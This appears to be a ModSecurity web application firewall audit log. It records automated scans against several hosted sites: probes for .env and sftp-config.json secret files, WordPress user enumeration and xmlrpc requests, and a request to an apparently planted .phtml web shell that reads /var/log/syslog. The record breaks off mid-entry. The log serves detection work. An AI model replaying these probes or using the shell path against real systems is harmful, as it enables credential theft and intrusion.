Chrome/91.0.4472.124 Safari/537.36 cf-connecting-ip: 185.177.72.201 --93313e4f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://cdn.gtranslate.net/>; rel=dns-prefetch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13669 Connection: close Content-Type: text/html; charset=UTF-8 --93313e4f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.getcalley.com"] [uri "/.env.local"] [unique_id "aE6N1X15LOn2YRwTZIj72QAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749978581305709 265446 (- - -) Stopwatch2: 1749978581305709 265446; combined=1725, p1=354, p2=1278, p3=0, p4=0, p5=92, sr=100, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --93313e4f-Z-- --e1d8f863-A-- [15/Jun/2025:14:39:42.046380 +0530] aE6N1bIQi_ruyWEJ7bFMogAAAAk 172.71.127.136 55802 127.0.0.1 7081 --e1d8f863-B-- GET /.env.old HTTP/1.0 Host: www.getcalley.com X-Real-IP: 172.71.127.136 X-Forwarded-For: 185.177.72.201 Connection: close cf-ray: 9500ee17c802d145-CDG cf-visitor: {"scheme":"https"} cf-ipcountry: FR accept-encoding: gzip, br cdn-loop: cloudflare; loops=1 x-forwarded-proto: https user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 cf-connecting-ip: 185.177.72.201 --e1d8f863-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://cdn.gtranslate.net/>; rel=dns-prefetch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13669 Connection: close Content-Type: text/html; charset=UTF-8 --e1d8f863-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.getcalley.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.getcalley.com"] [uri "/.env.old"] [unique_id "aE6N1bIQi_ruyWEJ7bFMogAAAAk"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.getcalley.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.getcalley.com"] [uri "/.env.old"] [unique_id "aE6N1bIQi_ruyWEJ7bFMogAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749978581778930 267535 (- - -) Stopwatch2: 1749978581778930 267535; combined=1928, p1=330, p2=1501, p3=0, p4=0, p5=97, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e1d8f863-Z-- --a402d463-A-- [15/Jun/2025:14:39:42.450663 +0530] aE6N1k86SWGxMlRL5UU7rAAAAAU 172.71.127.136 55820 127.0.0.1 7081 --a402d463-B-- GET /.env.prod HTTP/1.0 Host: www.getcalley.com X-Real-IP: 172.71.127.136 X-Forwarded-For: 185.177.72.201 Connection: close cf-ray: 9500ee1a2dcad145-CDG cf-visitor: {"scheme":"https"} cf-ipcountry: FR accept-encoding: gzip, br cdn-loop: cloudflare; loops=1 x-forwarded-proto: https user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 cf-connecting-ip: 185.177.72.201 --a402d463-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://cdn.gtranslate.net/>; rel=dns-prefetch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13669 Connection: close Content-Type: text/html; charset=UTF-8 --a402d463-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.getcalley.com"] [uri "/.env.prod"] [unique_id "aE6N1k86SWGxMlRL5UU7rAAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749978582167692 283060 (- - -) Stopwatch2: 1749978582167692 283060; combined=1979, p1=377, p2=1501, p3=0, p4=0, p5=100, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a402d463-Z-- --baaea53c-A-- [15/Jun/2025:14:39:42.840208 +0530] aE6N1u2-FeQLXg88DU1qOQAAAAY 172.71.127.136 55826 127.0.0.1 7081 --baaea53c-B-- GET /.env.production.local HTTP/1.0 Host: www.getcalley.com X-Real-IP: 172.71.127.136 X-Forwarded-For: 185.177.72.201 Connection: close cf-ray: 9500ee1cbb54d145-CDG cf-visitor: {"scheme":"https"} cf-ipcountry: FR accept-encoding: gzip, br cdn-loop: cloudflare; loops=1 x-forwarded-proto: https user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 cf-connecting-ip: 185.177.72.201 --baaea53c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://cdn.gtranslate.net/>; rel=dns-prefetch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13669 Connection: close Content-Type: text/html; charset=UTF-8 --baaea53c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.getcalley.com"] [uri "/.env.production.local"] [unique_id "aE6N1u2-FeQLXg88DU1qOQAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749978582571639 268694 (- - -) Stopwatch2: 1749978582571639 268694; combined=1715, p1=362, p2=1237, p3=0, p4=0, p5=116, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --baaea53c-Z-- --bab0950c-A-- [15/Jun/2025:14:39:43.221250 +0530] aE6N1vPMR4vVu-R9olfJfgAAAAo 172.71.127.136 55856 127.0.0.1 7081 --bab0950c-B-- GET /.env.stage HTTP/1.0 Host: www.getcalley.com X-Real-IP: 172.71.127.136 X-Forwarded-For: 185.177.72.201 Connection: close cf-ray: 9500ee1f2847d145-CDG cf-visitor: {"scheme":"https"} cf-ipcountry: FR accept-encoding: gzip, br cdn-loop: cloudflare; loops=1 x-forwarded-proto: https user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 cf-connecting-ip: 185.177.72.201 --bab0950c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://cdn.gtranslate.net/>; rel=dns-prefetch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13669 Connection: close Content-Type: text/html; charset=UTF-8 --bab0950c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.getcalley.com"] [uri "/.env.stage"] [unique_id "aE6N1vPMR4vVu-R9olfJfgAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749978582963322 258015 (- - -) Stopwatch2: 1749978582963322 258015; combined=1674, p1=351, p2=1226, p3=0, p4=0, p5=97, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bab0950c-Z-- --d478f40d-A-- [15/Jun/2025:14:39:43.623513 +0530] aE6N1315LOn2YRwTZIj72gAAAAc 172.71.127.136 55866 127.0.0.1 7081 --d478f40d-B-- GET /admin/.env HTTP/1.0 Host: www.getcalley.com X-Real-IP: 172.71.127.136 X-Forwarded-For: 185.177.72.201 Connection: close cf-ray: 9500ee218d38d145-CDG cf-visitor: {"scheme":"https"} cf-ipcountry: FR accept-encoding: gzip, br cdn-loop: cloudflare; loops=1 x-forwarded-proto: https user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 cf-connecting-ip: 185.177.72.201 --d478f40d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://cdn.gtranslate.net/>; rel=dns-prefetch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13669 Connection: close Content-Type: text/html; charset=UTF-8 --d478f40d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.getcalley.com"] [uri "/admin/.env"] [unique_id "aE6N1315LOn2YRwTZIj72gAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749978583342490 281116 (- - -) Stopwatch2: 1749978583342490 281116; combined=1629, p1=358, p2=1174, p3=0, p4=0, p5=97, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d478f40d-Z-- --8749195e-A-- [15/Jun/2025:14:39:43.998551 +0530] aE6N17IQi_ruyWEJ7bFMowAAAAk 172.71.127.136 55894 127.0.0.1 7081 --8749195e-B-- GET /api/.env HTTP/1.0 Host: www.getcalley.com X-Real-IP: 172.71.127.136 X-Forwarded-For: 185.177.72.201 Connection: close cf-ray: 9500ee240aa9d145-CDG cf-visitor: {"scheme":"https"} cf-ipcountry: FR accept-encoding: gzip, br cdn-loop: cloudflare; loops=1 x-forwarded-proto: https user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 cf-connecting-ip: 185.177.72.201 --8749195e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://cdn.gtranslate.net/>; rel=dns-prefetch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13669 Connection: close Content-Type: text/html; charset=UTF-8 --8749195e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.getcalley.com"] [uri "/api/.env"] [unique_id "aE6N17IQi_ruyWEJ7bFMowAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749978583743178 255460 (- - -) Stopwatch2: 1749978583743178 255460; combined=1630, p1=321, p2=1210, p3=0, p4=0, p5=98, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8749195e-Z-- --eb23ba3e-A-- [15/Jun/2025:14:39:44.420743 +0530] aE6N2E86SWGxMlRL5UU7rQAAAAU 172.71.127.136 55924 127.0.0.1 7081 --eb23ba3e-B-- GET /apps/.env HTTP/1.0 Host: www.getcalley.com X-Real-IP: 172.71.127.136 X-Forwarded-For: 185.177.72.201 Connection: close cf-ray: 9500ee269866d145-CDG cf-visitor: {"scheme":"https"} cf-ipcountry: FR accept-encoding: gzip, br cdn-loop: cloudflare; loops=1 x-forwarded-proto: https user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 cf-connecting-ip: 185.177.72.201 --eb23ba3e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://cdn.gtranslate.net/>; rel=dns-prefetch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13669 Connection: close Content-Type: text/html; charset=UTF-8 --eb23ba3e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.getcalley.com"] [uri "/apps/.env"] [unique_id "aE6N2E86SWGxMlRL5UU7rQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749978584157553 263292 (- - -) Stopwatch2: 1749978584157553 263292; combined=1991, p1=403, p2=1475, p3=0, p4=0, p5=113, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --eb23ba3e-Z-- --5dd35247-A-- [15/Jun/2025:14:45:18.166516 +0530] aE6PJcZRGs9Zs5Qd_koPtwAAAAA 35.181.43.144 39750 127.0.0.1 7081 --5dd35247-B-- GET /sftp-config.json HTTP/1.0 Host: www.mindscan.edu.in X-Real-IP: 35.181.43.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --5dd35247-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.mindscan.edu.in/wp-json/>; rel="https://api.w.org/" Set-Cookie: _sfs_id=109dcdf775a0a93e3bbbba962f45d7e31749978917; expires=Sun, 15 Jun 2025 10:15:17 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --5dd35247-H-- Message: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.mindscan.edu.in"] [uri "/sftp-config.json"] [unique_id "aE6PJcZRGs9Zs5Qd_koPtwAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/mindscan.edu.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749978917059982 1106599 (- - -) Stopwatch2: 1749978917059982 1106599; combined=1675, p1=385, p2=1206, p3=0, p4=0, p5=83, sr=94, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5dd35247-Z-- --35e3133b-A-- [15/Jun/2025:15:00:10.468563 +0530] aE6SorIQi_ruyWEJ7bFOsAAAAAk 3.1.213.160 39868 127.0.0.1 7081 --35e3133b-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 3.1.213.160 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --35e3133b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://archangledesignstudio.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin,User-Agent Connection: close Content-Type: application/json; charset=UTF-8 --35e3133b-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "archangledesignstudio.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE6SorIQi_ruyWEJ7bFOsAAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749979810197104 271533 (- - -) Stopwatch2: 1749979810197104 271533; combined=1658, p1=309, p2=1270, p3=0, p4=0, p5=78, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --35e3133b-Z-- --885e5c74-A-- [15/Jun/2025:15:00:13.610563 +0530] aE6Spd-DHezsSmx4VonDeQAAAAI 3.1.213.160 40494 127.0.0.1 7081 --885e5c74-B-- POST //xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 3.1.213.160 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 487 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --885e5c74-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --885e5c74-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 3.1.213.160 (+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 3.1.213.160 (+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE6Spd-DHezsSmx4VonDeQAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749979813275707 334922 (- - -) Stopwatch2: 1749979813275707 334922; combined=2345, p1=337, p2=1506, p3=47, p4=69, p5=232, sr=91, sw=154, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --885e5c74-Z-- --d2ea066f-A-- [15/Jun/2025:15:00:18.256606 +0530] aE6SqU86SWGxMlRL5UU9uwAAAAU 3.1.213.160 41078 127.0.0.1 7081 --d2ea066f-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 3.1.213.160 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --d2ea066f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --d2ea066f-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||arch.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||arch.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "arch.cstechns.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE6SqU86SWGxMlRL5UU9uwAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749979817573781 682901 (- - -) Stopwatch2: 1749979817573781 682901; combined=2108, p1=352, p2=1667, p3=0, p4=0, p5=88, sr=105, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d2ea066f-Z-- --64c0bc45-A-- [15/Jun/2025:15:05:44.373169 +0530] aE6T8H15LOn2YRwTZIj-eAAAAAc 23.21.175.228 59900 127.0.0.1 7081 --64c0bc45-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//var/log&viewfile=//var/log/syslog.4.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 23.21.175.228 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --64c0bc45-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2947 Connection: close Content-Type: text/html; charset=UTF-8 --64c0bc45-H-- Message: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /var/log/syslog.4.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /var/log/syslog.4.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6T8H15LOn2YRwTZIj-eAAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1749980144369075 4147 (- - -) Stopwatch2: 1749980144369075 4147; combined=2255, p1=350, p2=1768, p3=37, p4=34, p5=66, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --64c0bc45-Z-- --531b3425-A-- [15/Jun/2025:15:06:00.876239 +0530] aE6UAMZRGs9Zs5Qd_koRxwAAAAA 34.194.14.255 53586 127.0.0.1 7081 --531b3425-B-- GET 